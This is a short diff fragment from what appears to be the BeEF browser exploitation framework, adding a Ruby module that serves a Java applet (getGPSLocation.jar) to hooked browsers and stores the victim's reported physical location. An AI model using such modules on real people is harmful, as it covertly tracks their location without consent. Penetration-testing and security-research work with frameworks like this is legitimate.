+		// linux or unix
+		return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
+ 
+	}
+
+    }  
diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb
new file mode 100755
index 000000000..9487c3a26
--- /dev/null
+++ b/modules/host/get_physical_location/module.rb
@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Get_physical_location < BeEF::Core::Command
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
+  end
+
+  def post_execute
+    save({'result' => @datastore['location_info']})
+  end
+  
+end
+